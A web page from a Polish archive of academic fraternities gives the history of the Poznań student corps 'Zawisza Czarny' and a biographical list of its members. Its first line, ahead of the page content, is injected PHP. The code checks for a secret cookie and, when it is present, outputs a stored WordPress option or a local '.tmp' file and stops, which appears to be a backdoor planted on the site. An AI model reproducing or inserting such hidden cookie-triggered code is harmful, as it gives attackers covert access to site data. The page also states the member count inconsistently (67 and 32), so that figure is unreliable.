if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Korpus Zawisza Czarny

Dekiel Mariana Iwiańskiego. Nazwa:
Korpus Studentów Uniwersytetu Poznańskiego “Zawisza Czarny”
Siedziba:
Poznań
Data powstania:
14 VIII 1923 r.
Barwy:
złota – czarna – srebrna
Dewiza:
„Salus Poloniae suprema lex”

Rys historyczny

Jednodniówka Korpusu, Poznań 1927 r.

Korpus Zawisza Czarny został założony dnia 14 VIII 1923 r. przez grupę kilku studentów Uniwersytetu Poznańskiego, którzy jak napisano przyjęli “pod względem formy typ korporacji jako organizacji studenckiej”, ale krocząc “pod względem treści (…) innymi drogami”. Organizacja powstała w opozycji do istniejących wówczas w Poznaniu i Polsce korporacji akademickich.

W ideologii nowej korporacji silnie akcentowano znaczenie polskich tradycji rycerskich oraz oparcie działalności o wartości chrześcijańskie, a w konsekwencji w szczególności - co stanowiło wówczas przedmiot gorących dyskusji - zajęto stanowisko antyduelanckie tj. odrzucające dopuszczalność rozstrzygania sporów honorowych w drodze pojedynku. Wyraźnie podkreślano także apolityczność organizacji.

Komers Zawiszy Czarnego, Poznań 1934 r.

Uniwersytecki Senat zatwierdził Statut Korpusu, a tym samym zalegalizował jego działalność na uczelni dnia 31 III 1924 r. Kuratorami byli w latach 1924-36 prof. Stefan Horoszkiewicz, a następnie prof. Kazimierz Chodynicki.

Od 1932 r. Zawisza Czarny należał do Związku Polskich Korpusów Studenckich.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 67 nazwisk.

Brak wiadomości o powojennej działalności korporacji i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Korpusu Zawisza Czarny obejmuje 32 nazwiska. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Tadeusz Adamski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 2. Karol Aulich, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 3. Stanisław Bojarski, (?)
 4. Teodor Bosak, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 5. Kryspin Chojnacki, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 6. Witold Ciesielski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, skarbnik sem. zim. i sem. let. 1937/38

  Konrad Cieśliński

 7. Konrad Cieśliński, (15 października 1913 w Zbąszyniu - 2 listopada 1995 w Rawiczu) s. Feliksa (stolarz) i Stefanii z d. Wołczyk, absolwent Gimnazjum w Rawiczu, student i absolwent UP 1931-35, kwestor ok. 1935, po studiach ukończona przed wojna aplikacja sędziowska w Poznaniu, członek Akcji Katolickiej w Poznaniu, oficer rez., walczył w wojnie obronnej 1939, zbiegł z niewoli sowieckiej, w czasie okupacji w AK, w tajnym nauczaniu w Krakowie i Częstochowie, po wojnie sędzia w Bojanowie, za odmowę wstąpienia do partii usunięty ze stanowiska sędziego, radca prawny, pracował m.in. w Spółdzielni Ogrodniczo-Pszczelarskiej w Kościanie i fabryce opon w Bolechowie, od 1961 adwokat w Górze Śląskiej, w 1975 utworzył Zespół Adwokacki nr 2 w Rawiczu, gdzie pracował do emerytury w 1988, później pracował jeszcze jako samodzielny adwokat, w 1984 odznaczony medalem “Zasłużonemu dla Adwokatury”, pochowany na cmentarzu parafialnym w Rawiczu [Źródła (poza wskazanymi poniżej spisu członków): relacja córki Teresy Cieślińskiej; pomoc Krzysztof Wodyński]

 8. Leon Dłużewski, członek Myśli Mocarstwowej
 9. Antoni Gdaniec, w 1937 student Wydziału Lekarskiego UP
 10. Antoni Golaniec, olderman sem. let. 1935/36

  Jan Granatowicz, lata 30-te.

 11. Jan Granatowicz, (14 października 1913 we Frakfurcie nad Odrą - 17 grudnia 1942 we Wrocławiu) s. Stefana i Kazimiery z d. Krąkowska, (brat Józefa (Aesculapia), absolwent Gimnazjum im. Karola Marcinkowskiego w Poznaniu, student chemii na Wydziale Matematyczno-Przyrodniczym UP, trenował jeździectwo, boks, łyżwiarstwo, kolarstwo i piłkę nożną, oficer rez., zmobilizowany uczestniczył w wojnie obronnej 1939, w konspiracji członek Narodowej Organizacji Bojowej w Poznaniu, aresztowany przez Niemców, skazany za zdradę stanu, ścięty, miejsce pochówku nieznane

 12. Bernard Grochowski, w 1937 student Wydziału Humanistycznego UP
 13. Dionizy Gusowski, w 1937 student Wydziału Lekarskiego UP
 14. Adam Hernet, w 1937 student Wyziału Humanistycznego UP

  Marian Iwiański, ok. 1925 r.

 15. Marian Iwiański (Ibiański) (4 stycznia 1896 w Radziwiszkach -1991) z rodziny szlacheckiej z Laudy herbu Jasieńczyk, s. Józefa i Marii z Puykiewiczów, elew szkoły kadetów marynarki carskiej “Gardemarin” w St. Petersburgu (w tym okresie zruszczeniu eległo jego nazwisko na “Iwiański”), po rewolucji rosyjskiej 1917 na Litwie, w 1926 wyemigrował do Polski i osiedlił się w Poznaniu, student i absolwent WSH 1926-30, pracownik Banku Ziemstwa Kredytowego, w 1947 uzyskał tytuł magistra, po wojnie przez wiele lat wykładowca Technikum Ekonomicznego w Poznaniu oraz kierownik Lektoratów Języków Obcych w Wyższej Szkole Ekonomicznej w Poznaniu w randze prof. nadzw., odzaczony m.in. Złotym Krzyżem Zasługi oraz Krzyżem Kawalerskim OOP

 16. Feliks Jarzemski, w 1937 student Wydziału Humanistycznego UP, skarbnik sem. let. 1935/36
 17. Jerzy Jasiński, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 18. Marian Jazgar, w 1937 student Wydziału Humanistycznego UP
 19. Edmund Kalinowski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 20. Kalinowski
 21. Wiktor Karcz, w 1937 student Wydziału Prawno-Ekonomicznego UP, wiceprezes sem. zim. i sem. let. 1937/38, prezes sem. let. 1938/39
 22. Marian Kleczko, w 1937 student Wydziału Lekarskiego UP
 23. Albin Kołodziejczyk, w 1937 student WF na Wydziele Lekarskim UP
 24. Zdzisław Konwerski, założyciel Korpusu
 25. Bernard Kozakowski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 26. Romuald Kozłowski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 27. Janusz Kulikowski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 28. Tadeusz Kurka, w 1937 student Wydziału Prawno-Ekonomicznego UP, sekretarz sem. let. 1938/39
 29. Zygfryd Lipiński, w 1937 student Wydziału Humanistycznego UP
 30. Jan Łukaszkiewicz, członek Myśli Mocarstwowej
 31. Ireneusz Marchwicki
 32. Stanisław Matysiak, w 1937 student Wydziału Humanistycznego UP
 33. Zygmunt Milewski, w 1937 student Wydziału Humanistycznego UP, wiceprezes sem. let. 1935/36, wiceprezes sem. let. 1936/37
 34. Florian Mioduszewski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, członek Młodzieży Wszechpolskiej, autor słowników farmaceutycznych

  Zdzisław Mitkiewicz, 1935 r.

 35. Zdzisław Mitkiewicz, (15 maja 1908 Warszawa – 16 kwietnia 1994 Szczecin) w 1937 student Wydziału Prawno-Ekonomicznego UP, sekretarz, a potem olderman sem. let. 1933/34, prezes sem. let. 1935/36, prezes sem. let. 1936/37, olderman sem. let. 1937/38, członek Młodzieży Wszechpolskiej, w czasie okupacji w konspiracji AK, uczestnik Powstania Warszawskiego, po wojnie od 1946 w Szczecinie, pracował w Zakładach Konfekcyjnych, później w NBP, dyrektor Izby Rzemieślniczej, działacz polityczny, po 1945 PSL, a następnie SP i SD, z ramienia SD, radny Miejskiej Rady Narodowej, w tym wiceprzewodniczący 1958-69, od 1964 prezes, a później honorowy prezes Związku Ochotniczych Straży Pożarnej w Szczecinie, od 1964 prezes Zarządu Miejskiego PCK, ławnik Sądu Wojewódzkiego 1984-1994, odznaczony m.in. Krzyżem Komandorskim OOP oraz licznymi odznaczeniami branżowymi SD, PCK, Związku Ochotniczych Straży Pożarnej

 36. Wiktor Mizgajski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 37. Stefan Morawski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, sekretarz sem. zim. i sem. let. 1937/38
 38. Józef Narolewski, (1917 - ) student na Wydziale Prawno Ekonomicznym UP
 39. Feliks Niedbał, wiceprezes sem. zim. 1933/34
 40. Jan Niedziałkowski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 41. Tadeusz Olszanowski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, skarbnik sem. let. 1936/37
 42. Franciszek Otomański, w 1937 student Wydziału Lekarskiego UP

  Janusz Papużyński, 1932 r.

 43. Janusz Papużyński, (12 marca 1911 w Chełmie - 13 października 1989 w Chełmie) s. farmaceuty Józefa (Lechicja) i Jadwigi z Tymińskich, absolwent Gimnazjum Ogólnokształcącego im. Stefana Czarnieckiego w Chełmie 1932, prezes Sodalicji Mariańskiej w Chełmie, student farmacji Wydziału Matematyczno-Przyrodniczego UP 1932-37, olderman sem. let. 1936/37, od 1938 do wybuchu wojny pracował w aptece Stanisława Komornickiego w Łomży, od 1 września 1939 podjął pracę w aptece swego ojca Józefa Papużyńskiego w Chełmie, po śmierci ojca od 1944 kierownik tej apteki, we wrześniu 1944 powołany do Służby Sanitarnej 1 Armii WP, przez kilka miesięcy kierownik apteki Wojskowego Szpitala Garnizonowego w Chełmie, od 1948 kolejno nauczyciel Liceum Medycznego Pielęgniarstwa w Chełmie, Liceum Felczerskiego oraz Liceum Pielęgniarstwa, po upaństwowieniu rodzinnej apteki, początkowo jej kierownik, a później pracownik apteki nr 33 przy ul. Lenina 8 w Chełmie, a następnie do 1970 pracownik Przedsiębiorstwa Zaopatrzenia Farmaceutycznego „CEFARM” w Lublinie, aktywny działacz społeczny, m.in. prezes Zarządu Chrześcijańskiego Towarzystwa Dobroczynności, radny Miejskiej Rady Narodowej w Chełmie, działacz Chrześcijańskiego Stowarzyszenia Społecznego, od 1961 członek Zarządu Głównego, a następnie Komisji Rewizyjnej, działał także we Froncie Jedności Narodu, w tym w Komitecie Wojewódzkim (reprezentował stanowisko programowe ChSS), przez 6 lat członek Zarządu Głównego Związku Zawodowego Pracowników Służby Zdrowia, w tym członek Zarządu Okręgu w Lublinie, członek Zarządu Polskiego Towarzystwa Farmaceutycznego – oddział w Lublinie oraz Zarządu Towarzystwa Miłośników Ziemi Chełmskiej, odznaczony m.in. Medalem „Zasłużony dla Miasta Chełma”, orderem 1000-lecia Państwa Polskiego, Złotym Krzyżem Zasługi, Krzyżem Kawalerskim Orderu Odrodzenia Polski, Medalem 40 – lecia Polski Ludowej, pochowany na cmentarzu przy ul. Lwowskiej w Chełmie

 44. Antoni Piaczyński, w 1937 student Wydziału Prawno-Ekonomicznego
 45. Tadeusz Pietrzak, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, olderman sem. let. 1938/39, farmaceuta, po wojnie dyrektorem Spółdzielni “Unia” w Warszawie
 46. Teodor Pilarski, członek Myśli Mocarstwowej
 47. Tadeusz Radzikowski, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, wiceprezes sem. let. 1938/39
 48. Alojzy Rumiński, w 1937 student Wydziału Prawno-Ekonomicznego UP
 49. Roman Sikora, w 1937 student Wydziału Humanistycznego UP, sekretarz sem. let. 1935/36, członek Myśli Mocarstwowej
 50. Wacław Sikorski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 51. Franciszek Specht, w 1937 student Wydziału Prawno-Ekonomicznego UP
 52. Mieczysław Stańczyk
 53. Michał Stojaczyk, w 1937 student Wydziału Matematyczno-Przyrodniczego UP
 54. Zdzisław Stolzmann, (1906-1997)
 55. Władysław Sygnarski, w 1937 student Wydziału Lekarskiego UP, po wojnie lekarz w Prabutach
 56. Zygmunt Sznajder, w 1937 student Wydziału Prawno-Ekonomicznego UP, sekretarz sem. zim. 1933/34
 57. Zygmunt Tarkowski, w 1937 student WF na Wydziele Lekarskim UP

  Henryk Tomaszewski, prawd. pierwsza połowa lat 30-tych.

 58. Henryk Tomaszewski, (21 maja 1909 w Berlinie - 1940 w Katyniu) herbu Bończa, s. Kazimierza (aptekarza) i Zofii z d. von Wendorff, brat Zenona (Korpus Zawisza Czarny), odbył kurs w Batalionie Podchorążych Rezerwy Piechoty nr 7 w Śremie 1931, ppor. 1933, od 1937 przydzielony do szpitala okręgowego, w 1937 student Wydziału Matematyczno-Przyrodniczego UP, pracował jako farmaceuta w aptece Klabecka w Bydgoszczy, ożenił się z Martą z d. Byszewska, bezdzietny, więzień obozu jenieckiego w Kozielsku, zamordowany przez NKWD w Katyniu

  Zenon Tomaszewski, prawd. 1944-45 r.

 59. Zenon Tomaszewski, (2 czerwca 1913 w Berlinie - 26 października 1992 w Suszu) herbu Bończa, s. Kazimierza (aptekarza) i Zofii z d. von Wendorff, brat Henryka (Korpus Zawisza Czarny), absolwent Gimnazjum Matematyczno-Przyrodniczego w Grudziądzu, student Wydziału Lekarskiego UP 1932(?)-1939 (zaświadczenie o zdanych egzaminach lekarskich wydane przez Warszawska Izbę Lekarską w Warszawie 10 lipca 1940, dyplom lekarza po zdaniu powtórnych egzaminów dyplomowych 14 grudnia 1946), sekretarz sem. let. 1936/37, prezes sem. zim. i sem. let. 1937/38, skarbnik sem. let. 1938/39, w wojnie obronnej w Armii Poznań, uczestniczył m.in. w bitwie nad Bzurą, wzięty do niewoli niemieckiej, z której uciekł do Poznania, w obozie wysiedleńczym pod Poznaniem od 16 grudnia 1939 do 1 lutego 1940, staż lekarski w szpitalu w Ostrowcu 1940/41, stanowisko asystenta Poradni Przeciwgruźliczej i Zakładu RTG 1941-43, w 1944 wcielony do LWP jako lekarz, przydzielony do pracy w przyfrontowym szpitalu w Rytwianach, a następnie jako starszy lekarz pułku dowódca kompanii sanitarnej, jako lekarz brał udział w operacji berlińskiej w 1945, 9 maja awansowany do stopnia kapitana LWP (w 1973 uzyskał stopień majora), po zakończeniu działań wojennych wraz ze swoja jednostka przeniesiony na południowo-wschodnie tereny Polski, gdzie trwała walka z oddziałami UPA, w końcu 1946 zdemobilizowany w wyniku problemów zdrowotnych, po zdemobilizowaniu pracował jako lekarz w Prabutach 1947, a od kwietnia 1947 do emerytury w 1985 lekarz w Suszu, m.in. dyrektor Powiatowego Szpitala Zakaźnego w Suszu, ordynator Oddziału Wewnętrznego Szpitala Powiatowego w Suszu, kierownik Zakładu RTG, kierownik Ośrodka Zdrowia i Ubezpieczalni Społecznej, dodatkowo pracował jako rentgenolog w Przychodni Obwodowej w Iławie 1965-68, radny miasta Susza w latach 60. i 70., społecznik, odznaczony m.in. Krzyżem Kawalerskim (1972) i Krzyżem Oficerskim OOP (1985), „Medalem za udział w wojnie obronnej 1939” (1982), Srebrnym Medalem „Zasłużonym na polu chwały” (1945), „Medalem za udział w walkach o Berlin” (1973), srebrną odznaką honorową „Zasłużony dla Warmii i Mazur” (1961), żonaty z Zofią z d. Ochęduszko, z którą miał trójkę dzieci Barbarę, Krystynę i Andrzeja, pochowany na cmentarzu katolickim w Suszu [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Andrzeja Tomaszewskiego]

 60. Michał Trzeciak, (18 czerwca 1907 w Dęblinie - 23 lipca 1971 w Szczecinie) s. Michała Lucjana i Zofii z Krasuskich, absolwent Staroklasycznego Gimnazjum w Wągrowcu oraz med. UP, po studiach lekarz w Żarnowcu nad Pilicą, uczestnik wojny obronnej 1939, w okresie okupacji do 1943 lekarz w Wolbromiu w Małopolsce, członek Batalionu “Surowiec” w Okręgu Krakowskim AK, od 1945 lekarz w Krotoszynie, a następnie w Szczecinie, dyrektor Wojewódzkiej Stacji Krwiodawstwa, pochowany na Cmentarzu Komunalnym przy ul. Ku Słońcu w Szczecinie
 61. Stanisław Waliszewski, skarbnik sem. zim. 1933/34, członek Myśli Mocarstwowej
 62. Wincenty Wencel, w 1937 student Wydziału Prawno-Ekonomicznego UP
 63. Witold Wielicki, w 1937 student Wydziału Lekarskiego UP
 64. Jan Wichliński, prezes sem. zim. 1933/34
 65. Witold Wiśniewski, w 1937 student Wydziału Prawno-Ekonomicznego UP
 66. Czesław Wojnerowicz, w 1937 student Wydziału Rolno-Leśnego UP
 67. Kazimierz Wójcikowski , w 1937 student Wydziału Matematyczno-Przyrodniczego UP, sekretarz sem. let. 1933/34 (od maja), członek Młodzieży Wszechpolskiej

Listę członków opracowano na podstawie:

1) Spis członków Korpusu Studentów U.P. “Zawisza Czarny” według stanu na 1 lutego 1937 r., maszynopis, Archiwum UAM,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korpusu Zawisza Czarny.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 6 X 2010 r.
Ostatnia zmiana: 23 III 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korpus Studentów Uniwersytetu Poznańskiego “Zawisza Czarny”, (na:) www.archiwumkorporacyjne.pl, stan 23 III 2022 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }